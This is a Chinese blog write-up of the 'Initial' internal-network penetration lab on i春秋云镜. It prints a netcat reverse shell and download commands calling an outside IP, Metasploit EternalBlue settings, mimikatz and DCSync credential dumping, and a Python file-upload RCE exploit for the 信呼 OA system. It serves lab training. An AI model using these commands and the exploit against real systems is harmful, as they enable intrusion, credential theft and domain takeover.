i春秋云镜之Initial

于 2023-12-15 21:50:38 发布
阅读量568 收藏 9
点赞数 7
文章标签: 域渗透 内网渗透 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_65550121/article/details/135025806
版权

首先拿到目标IP:39.99.156.72
通过Fscan进行扫描发现存在Thinkphp RCE漏洞。

./fscan_amd64 -h 39.99.156.72

在这里插入图片描述
然后通过利用工具进行RCE。
在这里插入图片描述
我们进行getshell之后通过蚁剑进行连接。
在这里插入图片描述
反弹shell并转换成python 交互式shell。

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 43.137.19.241 3377 >/tmp/f
python3 -c 'import pty; pty.spawn("/bin/bash")'

在这里插入图片描述
查看ip

hostname -I

在这里插入图片描述
上传fscan,并使用fscan扫描。

wget http://43.137.19.241:5000/fscan_amd64
chmod +x fscan_amd64
./fscan_amd64 -h 172.22.1.0/24

[*] alive ports len is: 14
start vulscan
[*] NetInfo:
[*]172.22.1.21
   [->]XIAORANG-WIN7
   [->]172.22.1.21
[*] NetInfo:
[*]172.22.1.2
   [->]DC01
   [->]172.22.1.2
[*] NetInfo:
[*]172.22.1.18
   [->]XIAORANG-OA01
   [->]172.22.1.18
[*] 172.22.1.2  (Windows Server 2016 Datacenter 14393)
[+] 172.22.1.21	MS17-010	(Windows Server 2008 R2 Enterprise 7601 Service Pack 1)
[*] NetBios: 172.22.1.21     XIAORANG-WIN7.xiaorang.lab          Windows Server 2008 R2 Enterprise 7601 Service Pack 1 
[*] NetBios: 172.22.1.18     XIAORANG-OA01.xiaorang.lab          Windows Server 2012 R2 Datacenter 9600 
[*] WebTitle: http://172.22.1.15        code:200 len:5578   title:Bootstrap Material Admin
[*] NetBios: 172.22.1.2      [+]DC DC01.xiaorang.lab             Windows Server 2016 Datacenter 14393 
[*] WebTitle: http://172.22.1.18        code:302 len:0      title:None 跳转url: http://172.22.1.18?m=login
[*] WebTitle: http://172.22.1.18?m=login code:200 len:4012   title:信呼协同办公系统
[+] http://172.22.1.15 poc-yaml-thinkphp5023-method-rce poc

在这里插入图片描述
紧接着通过sudo进行提权。

sudo -l

sudo -l

在这里插入图片描述

sudo mysql -e '\! cat /root/flag/flag01.txt'

在这里插入图片描述

flag{60b53231-

紧接着在fscan中可以看到存在一个ms17-010的机器,也就是172.22.1.21。

这里我们做一个nps隧道。

./npc -server=43.137.19.241:8024 -vkey=23qm41udjudhnbu0 -type=tcp

在这里插入图片描述
紧接着通过MSF打MS17-010。

use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp_uuid
set RHOSTS 172.22.1.21

得多打几次。

上去之后先迁移进程防止掉了。
在这里插入图片描述
加载mimikatz并导出hash。

load kiwi
creds_all

在这里插入图片描述
这里的WIN7$机器账户有着DCSYNC的权限,我们可以直接dcsync也可以通过crack…来进行直接PTH。

kiwi_cmd lsadump::dcsync /all /csv

在这里插入图片描述
然后通过hash传递拿到第三个flag即可。
在这里插入图片描述
信呼协同办公系统:

弱口令: admin admin123

这个系统在2.2有一个文件上传的漏洞。

参考文章:https://blog.csdn.net/solitudi/article/details/118675321

exp:

import requests


session = requests.session()

url_pre = 'http://172.22.1.18/'
url1 = url_pre + '?a=check&m=login&d=&ajaxbool=true&rnd=533953'
url2 = url_pre + '/index.php?a=upfile&m=upload&d=public&maxsize=100&ajaxbool=true&rnd=798913'
url3 = url_pre + '/task.php?m=qcloudCos|runt&a=run&fileid=11'

data1 = {
    'rempass': '0',
    'jmpass': 'false',
    'device': '1625884034525',
    'ltype': '0',
    'adminuser': 'YWRtaW4=::',
    'adminpass': 'YWRtaW4xMjM=',
    'yanzm': ''
}


r = session.post(url1, data=data1)
r = session.post(url2, files={'file': open('1.php', 'r+')})

filepath = str(r.json()['filepath'])
filepath = "/" + filepath.split('.uptemp')[0] + '.php'
id = r.json()['id']

url3 = url_pre + f'/task.php?m=qcloudCos|runt&a=run&fileid={id}'

r = session.get(url3)
r = session.get(url_pre + filepath)
print(r.text)
print(url_pre + filepath)

在这里插入图片描述
然后我们通过蚁剑挂代理进行连接。

连上之后发现是system权限,因为phpstudy启动需要管理员权限。
在这里插入图片描述
获取到第二段flag。

type c:\users\administrator\flag\flag02.txt
flag02: 2ce3-4813-87d4-

在这里插入图片描述
并且给出了提示说可以打域控了。

这里我得重启一下靶机,因为ms17-010一直返回不了session给打崩了。

flag{60b53231-2ce3-4813-87d4-e8f88d0d43d6} 最终flag。

0x30sec
关注
  • 7
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
春秋云境—Initial
龙狼刺的博客
07-15 1847
Initial是一套难度为简单的靶场环境,完成该挑战可以帮助玩家初步认识内网渗透的简单流程。该靶场只有一个flag,各部分位于不同的机器上。在DCSync技术没有出现之前,攻击者要想拿到内用户的hash,就只能在控制器上运行 Mimikatz 或 Invoke-Mimikatz去抓取密码hash,但是在2015 年 8 月份, Mimkatz新增了一个主要功能叫"DCSync",使用这项技术可以有效地 “模拟” 控制器并从目标控上请求内用户密码hash。
Initial
10-28
从提供的信息来看,我们有两个文件:Initial1.GIF和Initial.ttf。前者可能是展示这个字体样式的图像文件,后者则是一个TrueType字体文件。 TrueType是一种由Apple公司和Microsoft公司共同开发的字体技术,广泛应用...
春秋云镜-Initial-Writeup
最新发布
qq_35607078的博客
07-11 1062
春秋运镜-Initial-Writeup
春秋云镜-【仿真场景】Initial writeup
渗透测试研究中心
03-07 1226
开启靶机后是一个带着 ThinkPHP icon 的登陆界面,直接测试一下存在 5.0.23 RCE打一下,PHP-7.4.3 的环境,看一下 disable_functionspcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifco...
春秋云镜靶场Initial-WriteUP 专业徽章手把手教学
qq_45234543的博客
11-17 3776
春秋云镜靶场Initial-WP,专业徽章,完整flag获取教程
内网渗透春秋云镜Intitle WP
Sapphire037的博客
04-23 2142
第一次正式接触内网渗透的东西,写的很新手,也适合新手观看,有问题可以私信或评论,接下来会持续更新。
clock_initial.rar_clock_Initial
09-23
标题"clock_initial.rar_clock_Initial"表明这是一个关于初始化单片机时钟的项目,可能包含了设计一个电子钟的完整流程,包括硬件电路图和软件C代码。下面我们将深入探讨这个主题。 1. **单片机时钟基础**: ...
MySQL:reading initial communication packet问题解决方法
09-11
网站访问出现如题错误,经过检查my.cnf,发现innodb_buffer_pool_size = 2048M 设置过大,调整为innodb_buffer_pool_size = 1024M即可,网上也有该问题的其他解决方法,但都不能解决我的问题
Docker自动化CI
05-30
"Docker自动化CI" Docker自动化CI是指使用Docker容器来自动化持续集成(CI)过程。CI是软件开发过程中的一种实践,旨在通过自动化测试、构建和部署来提高软件质量和开发效率。在这个过程中,Docker容器可以作为CI...
initial-CV
03-21
标题“initial-CV”可能指的是一个初步的个人简历或求职信模板,这通常是一个用于展示个人技能、经验、教育背景和个人成就的文档。在IT行业中,这样的简历常常以HTML格式制作,以便在网络上传播和展示,同时也能体现...
靶场练习--春秋云境-Certify
NoooEmotion的博客
01-28 1704
Certify是一套难度为中等的靶场环境,完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法,加强对环境核心认证机制的理解,以及掌握环境渗透中一些有趣的技术要点。该靶场共有4个flag,分布于不同的靶机。
记一次内网靶机实战
千寻的博客
11-05 1925
记一次内网靶机实战记录,1、shiro反序列化漏洞 2、strut2漏洞 3、Drupal漏洞 4、内网代理工具 5、数据库连接工具 6、window的samba漏洞 7、viper的使用
内网渗透信息收集总结
2301_77732591的博客
05-03 1508
内网中通常会有大量网络安全系统和设备,IDS, IPS, 日志审计,安全网关,反病毒软件等。在一个中,当计算机加入之后,会默认给管理员组赋予本地系统管理员权限。因此,管理员组的成员均可访问本地计算机,且具有完全控制权限。定位管理员渠道:日志:本地机器管理员日志,使用脚本或者Wevtuil工具导出查看。会话,内每台机器的登录会话,netsess.exe, powerview 等工具查询。
春秋云镜-【仿真场景】Time-writeup
渗透测试研究中心
03-07 1184
说明Time是一套难度为中等的靶场环境,完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法,加强对环境核心认证机制的理解,以及掌握环境渗透中一些有趣的技术要点。该靶场共有4个flag,分布于不同的靶机。技术Neo4j、Kerberos、Privilege Elevation、渗透第一个flag外网IP信息收集start infoscan (ic...
渗透测试演练 DC-8
m0_73351035的博客
05-19 295
均失败,这里怀疑作者做了一些修改,也有可能是环境原因,那么进行手工测试。再点击 Webform,可直接添加 php 代码进行 getshell。尝试在线站点破解,失败,操作离线破解,先用 hashid 拿到编号。drupal 7 版本存在 RCE 以及 SQL。本次靶机 IP 10.10.10.138。访问 web 页面发现是 drupal。随便编辑内容提交,即可反弹 SHELL。
巡风源码浅析之 Vulscan 分析篇
hl1293348082的专栏
03-31 859
巡风是一款适用于企业内网的漏洞快速应急、巡航扫描系统,通过搜索功能可清晰的了解内部网络资产分布情况,并且可指定漏洞插件对搜索结果进行快速漏洞检测并输出结果报表。 开源地址: https://github.com/ysrc/xunfeng 0x00: VulScan 介绍 查看介绍前,请先查看《巡风源码浅析之 Nascan 分析篇》 的 0x01:分析准备,文章地址如下: https://landgrey.me/xunfeng-nascan-analysis/ VulScan 部分的目录结
[代码审计]信呼协同办公系统2.2存在文件上传配合云处理函数组合拳RCE
Y4tacker的博客
07-12 4952
文章目录写在前面漏洞分析脚本 写在前面 本次强网杯决赛的一个题,还是蛮有意思的 漏洞分析 首先这个系统存在弱口令,在题目给的sql文件当中通过在线md5破解得到test/abc123 接下来就是随便找一个地方进行文件上传 我们抓包看看对这个php文件进行了什么处理,其调用了webmain/task/api/uploadAction.php下uploadClassAction类的upfileAction函数 引入插件,实例化upfileChajian类 跳过不需太过于关注的部分,我们跟踪up函数 看看
内网viper的简单使用
千寻的博客
11-10 1192
Viper(炫彩蛇)是提供图形化的操作界面,用户使用浏览器即可进行内网渗透.使用过程记录
xunfeng(巡风)源码解读之vulscan
sojrs_sec的博客
12-03 1154
以前搭建过好几次xunfeng,也看过几次他的源码,最近团队准备做巡风的二次开发,就要再好好看下他的源码了,我们知道巡风主要有两个功能,资产发现和漏洞扫描,我主要负责漏洞扫描这块,就先简单记录下这块的大致流程 一:看源码tip 看源码,第一步看他的启动程序,可以看run.sh,巡风的启动程序主要就五块 mongodb启动:这里mongodb可以直接用二进制文件启动,导入导出,默认启动在本地的655...
population(i,:)=initial(randperm(length(initial(:))));
05-25
这行代码的作用是将initial数组中的元素随机排列后,将结果赋值给population数组的第i行。 具体来说,randperm函数会生成一个1到length(initial(:))的整数序列,并随机排列这个序列。然后,initial(:)将initial数组展开成一个列向量,这个列向量的长度为numel(initial),即initial数组中元素的总个数。最后,使用randperm函数生成的随机序列对展开后的列向量进行索引,得到一个随机排列的列向量。这个列向量就是population数组第i行的元素。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值